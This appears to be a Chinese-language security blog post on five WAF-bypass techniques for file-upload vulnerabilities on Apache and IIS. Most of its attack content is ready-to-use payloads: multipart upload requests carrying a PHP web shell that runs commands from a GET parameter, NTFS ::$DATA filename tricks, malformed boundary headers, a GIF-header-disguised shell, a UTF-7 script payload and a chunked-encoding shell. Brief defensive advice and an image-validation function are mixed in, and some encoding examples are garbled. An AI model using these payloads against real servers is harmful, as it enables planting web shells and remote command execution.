别再只盯着SQL注入了:从文件上传到WAF层Bypass的5个冷门技巧(含Apache/IIS特性)
突破WAF防护:文件上传漏洞的5个高阶绕过技巧
当大多数安全人员还在研究SQL注入的WAF绕过时,攻击者早已将目光转向了同样危险但防御薄弱的上传漏洞。本文将揭示那些鲜为人知却极具破坏性的文件上传绕过技术,帮助安全团队构建更全面的防御体系。
1. 解析特性:利用服务器与WAF的认知差异
不同Web服务器对文件名的解析方式存在微妙差异,这种差异往往成为绕过WAF的关键。以Apache为例,当遇到shell.php.xyz这样的文件名时:
- WAF视角:检测
.xyz扩展名(通常不在黑名单) - Apache视角:从右向左查找第一个可识别的扩展名,最终执行
.php文件
实战案例:
POST /upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="file"; filename="shell.php.null" Content-Type: application/octet-stream <?php system($_GET['cmd']); ?>防御建议:
- 在Nginx配置中添加严格的文件扩展名检查
- 使用
mime.types文件明确定义允许的MIME类型 - 禁用非常规扩展名的执行权限
2. NTFS数据流:Windows系统的隐藏通道
NTFS交换数据流(ADS)是Windows文件系统的特性,允许单个文件关联多个数据流。攻击者可构造如下payload:
filename="shell.php::$DATA" filename="shell.asp:图片.jpg"绕过原理:
- WAF可能只检测主文件名部分
- IIS服务器会忽略
::$DATA等特殊标记,直接执行原始扩展名
检测方案:
| 检测点 | 常规方法 | 增强方案 |
|---|---|---|
| 文件名 | 正则匹配 | 深度解析NTFS流 |
| 内容检测 | 特征扫描 | 动态沙箱执行 |
3. 边界混淆:突破multipart格式检测
当WAF对multipart请求的解析与服务器不一致时,可通过精心构造的boundary实现绕过:
技巧组合:
- 插入非法boundary分隔符
--wrong-boundary Content-Disposition: form-data; name="file"; filename="shell.php" - 使用畸形换行符
Content-Disposition:\x0bform-data; name="file"; filename="backdoor.php" - 多重Content-Disposition
Content-Disposition: form-data; name="file"; filename="legit.jpg" Content-Disposition: form-data; name="file"; filename="malware.php"
关键差异:
- PHP通常只处理最后一个Content-Disposition
- IIS可能优先采用第一个声明
4. 编码变异:绕过内容检测机制
当直接上传恶意代码被拦截时,可尝试以下编码变形:
有效变形方式:
- UTF-7编码:
+ADw-script+AD4-alert(1)+ADw-/script+AD4- - 双重URL编码:
%2570%2568%2570(解码后为php) - HTML实体编码:
php
案例:GIF头欺骗
GIF89a; <?php // 二进制数据后跟随实际恶意代码 system($_GET['cmd']); ?>检测对抗:
def validate_image(file): from PIL import Image try: img = Image.open(file) img.verify() return True except: return False5. 协议层绕过:利用HTTP规范模糊点
高级技巧:
分块传输编码:
Transfer-Encoding: chunked 5E <?php system($_GET['cmd']); ?> 0请求方法混淆:
GET /upload.php HTTP/1.1 Host: target.com Content-Length: 135 Content-Type: multipart/form-data; boundary=----ABC123 ------ABC123 Content-Disposition: form-data; name="file"; filename="shell.php"HTTP/2特性利用:
- 标头压缩可隐藏敏感字段
- 流复用可拆分恶意payload
防御矩阵:
- 在WAF规则中启用严格的协议合规检查
- 对上传文件实施强制重命名策略
- 使用容器隔离执行用户上传内容
- 部署行为分析检测异常文件操作
这些技术在实际渗透测试中往往需要组合使用。安全团队应当定期测试自己的防御系统,模拟攻击者思维,才能构建真正有效的防护体系。